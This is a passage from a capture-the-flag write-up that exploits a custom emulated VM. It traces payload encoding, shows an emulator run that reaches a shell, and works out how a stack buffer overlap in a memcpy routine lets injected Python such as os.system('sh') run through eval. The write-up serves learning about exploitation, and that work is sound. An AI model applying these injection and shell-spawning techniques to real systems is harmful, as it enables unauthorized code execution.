Step 1: Base 11**5: [111242, 150449, 72842, 118980, 111491, 20754, 102804, 97339, 3220, 105622, 80760, 47851, 104857, 74258, 33121, 17215, 14, 98515, 124690, 74691, 121462, 72899, 136909, 121091, 37828, 89340, 109283, 70696, 144197, 52632]
Step 1: Base 2**8: [36, 77, 105, 55, 120, 105, 69, 105, 102, 77, 39, 55, 59, 104, 57, 87, 50, 60, 59, 91, 51, 120, 80, 107, 41, 69, 75, 98, 94, 60, 96, 34, 58, 101, 107, 108, 35, 106, 67, 57, 96, 80, 107, 75, 46, 47, 102, 119, 81, 102, 118, 43, 43, 41, 89, 93, 106, 52, 121, 34, 96, 49, 92, 110, 39]
Step 1: b'$Mi7xiEifM\'7;h9W2<;[3xPk)EKb^<`":ekl#jC9`PkK./fwQfv++)Y]j4y"`1\\n\''
Step 2: Base 11**5: [111242, 150449, 72842, 118980, 111491, 20754, 102804, 97339, 3220, 105622, 80760, 47851, 144332, 98232, 150289, 141022, 126407, 12595, 12240, 0, 81935, 994, 2804, 0, 37828, 89340, 109283, 70696, 144197, 52632]
Step 2: Base 2**8: [40, 195, 32, 27, 73, 49, 21, 46, 75, 70, 206, 248, 94, 69, 4, 144, 31, 236, 215, 125, 229, 49, 174, 56, 208, 217, 30, 73, 144, 220, 159, 54, 17, 28, 192, 3, 206, 56, 139, 184, 225, 248, 52, 105, 200, 75, 116, 164, 218, 228, 3, 194, 42, 41, 89, 93, 106, 52, 121, 34, 96, 49, 92, 110, 39]
Step 2: b'(\xc3 \x1bI1\x15.KF\xce\xf8^E\x04\x90\x1f\xec\xd7}\xe51\xae8\xd0\xd9\x1eI\x90\xdc\x9f6\x11\x1c\xc0\x03\xce8\x8b\xb8\xe1\xf84i\xc8Kt\xa4\xda\xe4\x03\xc2*)Y]j4y"`1\\n\''
Step 3: Base 11**5: [111242, 150449, 72842, 118980, 111491, 20754, 102804, 97339, 3220, 105622, 80760, 47851, 144332, 98232, 150289, 141022, 126407, 12595, 12240, 0, 81935, 994, 2804, 0, 37828, 89340, 109283, 70696, 144197, 52632]
Step 3: Base 2**8: [40, 195, 32, 27, 73, 49, 21, 46, 75, 70, 206, 248, 94, 69, 4, 144, 31, 236, 215, 125, 229, 49, 174, 56, 208, 217, 30, 73, 144, 220, 159, 54, 17, 28, 192, 3, 206, 56, 139, 184, 225, 248, 52, 105, 200, 75, 116, 164, 218, 228, 3, 194, 42, 41, 89, 93, 106, 52, 121, 34, 96, 49, 92, 110, 39]
Step 3: b'(\xc3 \x1bI1\x15.KF\xce\xf8^E\x04\x90\x1f\xec\xd7}\xe51\xae8\xd0\xd9\x1eI\x90\xdc\x9f6\x11\x1c\xc0\x03\xce8\x8b\xb8\xe1\xf84i\xc8Kt\xa4\xda\xe4\x03\xc2*)Y]j4y"`1\\n\''
Step 4: Base 11**5: [47728, 150452, 72842, 118980, 111491, 20754, 102804, 97339, 3220, 105622, 80760, 47851, 144332, 98232, 150289, 141022, 126407, 12595, 12240, 0, 81935, 994, 2804, 0, 37828, 89340, 109283, 70696, 144197, 52632]
Step 4: Base 2**8: [95, 42, 39, 27, 73, 49, 21, 46, 75, 70, 206, 248, 94, 69, 4, 144, 31, 236, 215, 125, 229, 49, 174, 56, 208, 217, 30, 73, 144, 220, 159, 54, 17, 28, 192, 3, 206, 56, 139, 184, 225, 248, 52, 105, 200, 75, 116, 164, 218, 228, 3, 194, 42, 41, 89, 93, 106, 52, 121, 34, 96, 49, 92, 110, 39]
Step 4: b'_*\'\x1bI1\x15.KF\xce\xf8^E\x04\x90\x1f\xec\xd7}\xe51\xae8\xd0\xd9\x1eI\x90\xdc\x9f6\x11\x1c\xc0\x03\xce8\x8b\xb8\xe1\xf84i\xc8Kt\xa4\xda\xe4\x03\xc2*)Y]j4y"`1\\n\''
Verifying that start and end are correct in base 2...
Prefix is b"_*'", expected is b"_*'"
Suffix is b"\\n'", expected is b"\\n'"
Verifying there are no illegal characters
Verifying that the full payload can be decoded...
Verifying that evaluating this does not cause problems...
Verifying the length is at most 42 words...
Verifying the words in the middle are as expected...
Payload: b'\x1bI1\x15.KF\xce\xf8^E\x04\x90\x1f\xec\xd7}\xe51\xae8\xd0\xd9\x1eI\x90\xdc\x9f6\x11\x1c\xc0\x03\xce8\x8b\xb8\xe1\xf84i\xc8Kt\xa4\xda\xe4\x03\xc2*)Y]j4y"`1\n'
Running the emulator with the payload as input...
Please enter your name
> Hello, 1.KF��^E���}�1�8��I�ܟ6��8����4i�Kt����*)Y]j4y"`1
$ pwd
$ exit
To get a shell on the remote we now only have to send one of the valid payloads that `runme14.py` produces. This is done in `solve.py`.
# The second vulnerability: Using a buffer overlap to obtain a single quote
Let us again look at the start of `memcpy_from_base256_to_base_161051`.
function memcpy_from_base256_to_base_161051(dest, src)
0146: PUSH REG5
0147: PUSH REG6
0148: REG5 = REG1
0149: REG6 = REG2
0150: REG1 = REG2
0151: CALL len_until_zero(pointer)
0152: REG7 = REG1
0153: REG7 += 1
0154: RSP = RSP - REG7
0155: PUSH REG1
0156: PUSH REG7
0157: REG3 = REG7
0158: REG2 = REG6
0159: REG1 = RSP
0160: REG1 += 2
0161: CALL memcpy(dest, src, length)
0162: REG2 = RSP
0163: REG2 += 1
0164: REG1 = REG5
0165: RSP += -2
0166: REG5 = 0 = b'\x00'
0167: > REG7 = MEM[REG2 + 0]
As we mentioned already above, after the length of the source is obtained, space on the stack allocated, and then the source buffer is copied to the stack. Let us consider the specific call to this function regarding our own input. The relevant calls arise as follows:
0032: REG1 = 404
0033: CALL eval_python_base_256(pointer)
function eval_python_base_256(pointer)
0118: REG2 = REG1
0119: REG1 = 125 = b'}'
0120: CALL memcpy_from_base256_to_base_161051(dest, src)
function memcpy_from_base256_to_base_161051(dest, src)
0146: PUSH REG5
0147: PUSH REG6
0148: REG5 = REG1
0149: REG6 = REG2
0150: REG1 = REG2
0151: CALL len_until_zero(pointer)
0152: REG7 = REG1
0153: REG7 += 1
0154: RSP = RSP - REG7
0155: PUSH REG1
0156: PUSH REG7
0157: REG3 = REG7
0158: REG2 = REG6
0159: REG1 = RSP
0160: REG1 += 2
0161: CALL memcpy(dest, src, length)
Our input, with prefix and suffix, is stored starting from address `404`, and stored in upwards direction. The stack pointer is set to `550` at the start and grows downwards. Note that the stack pointer addresses the word that will be popped at the next `POP`, so a `PUSH` will not write into this address, but the one below. The main function does not push anything to the stack. Then `eval_python_base_256(pointer)` will push the return address, making the stack pointer `549`. Then at the start of `memcpy_from_base256_to_base_161051(dest, src)`, three pushes are made, so that the stack pointer will become `546`.
Now the length of the input is calculated, and copied to `REG7`. This is without the zero byte at the end, but `REG7` is incremented to count that as well. Then this length plus zero byte many words are allocated on the stack, and the source string is copied (including the zero byte at the end).
From `404` (inclusive) to `546` (not inclusive) there are `142` words, which is `2*71`. This means that if the string being copied here (our input with prefix and suffix, including the zero byte at the end) is longer than `71` words, then there will be an overlap.
Concretely, as the `memcpy` function proceeds wordswise from the bottom, it some of the later words in the source buffer will have been already overwritten with the *beginning* of the source buffer, as these words also act as the beginning of the *destination* buffer.
To explain this better, let us assume that the distance between the buffer start and the stack were `20` rather than `142` words, and suppose the input we give would be `ABCDE`. Then before the copying, the relevant part of the memory would look like this, where address `0` here corresponds to `404` in the real memory layout.
| Address | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 || 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 |
| Content | _ | * | ' | A | B | C | D | E || \ | n | ' | \0 | | | | | | | | |
The length is taken with the zero byte as explained above, so in this case we get `12`, which means words `0` through `11` will be copied to words `8` through `19`.
So the `memcpy` function begins copying, beginning with the first word, yielding the following.
| Address | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 || 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 |
| Content | _ | * | ' | A | B | C | D | E || _ | n | ' | \0 | | | | | | | | |
After two more words being copied we are left with this:
| Address | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 || 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 |
| Content | _ | * | ' | A | B | C | D | E || _ | * | ' | \0 | | | | | | | | |
And after a total of 8 words have been copied this is the situation.
| Address | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 || 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 |
| Content | _ | * | ' | A | B | C | D | E || _ | * | ' | A | B | C | D | E | | | | |
Note that now the very next word to be copied is word `8` being copied to word `16`. But we already modified word `8`. So now we are copying the beginning of our string.
| Address | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 || 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 |
| Content | _ | * | ' | A | B | C | D | E || _ | * | ' | A | B | C | D | E | _ | | | |
Finally, the end result will be the following.
| Address | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 || 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 |
| Content | _ | * | ' | A | B | C | D | E || _ | * | ' | A | B | C | D | E | _ | * | ' | A |
One thing to note additionally is that before the call to `memcpy`, the two words on the stack just below the buffer that is copied to will be overwritten. This causes the `D` and `E` characters that are here at addresses `6` and `7` to be overwritten by junk. So we can not count on a couple of bytes of payload in that range.
So now let us calculate how exactly our payload will be transformed. Assume that the string we input, without the concluding newline, is `n` bytes long. Then, after concatenation with prefix and suffix and the final zero byte the total length will be `n+7`. We certainly need `n+7 > 71` to have the described effect, so let us write `n+7 = 71 + m`, where `m>0`. Then the copy on the stack will begin at offset `71 - m` of the original string. This means that the first `71 - m` characters will be the original ones, and starting with character indexed by `71 - m` there will be `2m` characters from the beginning again, with no further wraparound happening as long as `2m < 71 - m`, which is equivalent to `m <= 23`.
If the evaluated string is of the form `_*'???'+CODE#???`, where the `???` stand for some junk that isn't relevant (but in the first one not all characters are allowed, for example a single quote would be problematic) and `CODE` stands for python code to be evaluated such as `os.system("sh")`, then this will print the first junk string, then evaluate our Python code, and then thow an exception due to not being able to add values of certain types.
We can now achieve such a string being evaluated by inputting a string consisting of `+` concatenated with the Python code we want to run, and which we assume to be of length `c`, concatenated with `#` and a string of `k` copies of `A`s, for a certain value of `k`.
So what value of `k` should we choose? We will have `n = 1 + c + 1 + k = 2 + c + k`. This implies that
`m = n + 7 - 71 = 2 + c + k + 7 - 71 = c + k - 62`.
The condition `m > 0` that we need to have the overlap effect at all then implies `k > 62 - c`.
The condition `m <= 23` that we need to avoid a second overlap then implies `k <= 85 - c`.
Then we need the string up to the full code we want to evaluate to be part of the copied beginning. Thus `3 + 1 + c <= 2m` is required, as exactly `2m` characters from the start reoccur. This is equivalent to
`4 + c <= 2*c + 2*k - 2*62` and thus to
`2 + 62 - c/2 <= k`, so that we also need
`k >= 64 - c/2`.
Note that `64 - c/2 > 62 - c`, so this condition is stronger than `k > 62 - c`.
Finally, recall the two junk bytes we get just below destination buffer due to something being written on the stack.
We don't want that to overwrite our code or `#` following it. So those two bytes will have offsets `71 - m - 2` and `71 - m -1`.
We thus need `3 + 1 + c + 1 < 71 - m - 2`, which is equivalent to
`5 + c < 69 - m`, which is equivalent to
`5 + c < 69 - c - k + 62`, which is equivalent to
`k < 126 - 2c`.
We thus conclude in the end that we must have
64 - c/2 <= k <= 85 - c
0 <= k < 126 - 2c
The first inequality can be satisfied with nonnegative `k` as long as the upper bound is at least `0` and the lower bound is at most the upper bound.
The first condition comes down to `c <= 85`. The second condition means
`64 - c/2 <= 85 - c` which is equivalent to
`c/2 <= 21` which is equivalent to
`c <= 42`.
The last remaining condition is `k < 126 - 2c`, which is equivalent to `(k + c) + c < 126`. Note that if `c <= 40`, then this will be satisfied as `k + c <= 85`. If instead `c = 41` then we will need to have `k >= 44`, which implies `k + 2c >= 129`, so here there is no solution for `k`, and similarly if `c = 42` then `k >= 43`, but `43 + 2*42 = 127`. So the upshot is that for a solution to exist we must have `c <= 40`.
There is yet another constraint that we need to be aware of. If we use up too much of the stack, then the stack will grow too far and overwrite instructions and crash the program. Similarly, recall from the previous vulnerability/exploit that the base 11 version of our full payload should be maximum `42` words long. This latter condition comes down to
`(n + 7)*log(2**8, 11**5) <= 42`
which is equivalent to
`9 + c + k <= 90`
and hence `k <= 81 - c`.
Empirically it seems that with these restrictions we do not run into problems with the stack.
Thus the procedure to obtain the payload is as follows:
1. Begin with Python code to execute of length `c <= 40`.
2. Choose a nonnegative integer `k` satisfying `64 - c/2 <= k <= 81 - c`.
3. Take the concatenation of `+` with the code, then `#`, and then `k` many other characters (and at the end a newline).
This has been implemented in `runme15.py`, where such a payload is prepared and tried in the emulator. One such payload can also be found in `solve.py` to try on the challenge remotely.
# Final comments
During the competition I found and used the solution using the buffer overflow to write instructions that get called later. I worked through the first night of the contest for that, and it took me several hours at the end to cook up the payload satisfying all the required properties. This was way longer than it should have taken, and I made about every mistake possible (e.g. getting confused multiple times on where the prefix is contained or not in what I am currently looking at, and so on) and needed a while to figure out that I should construct the payload beginning from the most significant end. I think I would have likely been able to do this faster if I had been less tired, so my takeaway is to be more diligent with sleeping the next time.
The second solution I presented here, using the buffer overlap to copy the single quote from the start into the string, seems to be the vulnerability that the second team that solved the challenge, `Too young to win defcon, too old to win ecsc`, used.
Thank you.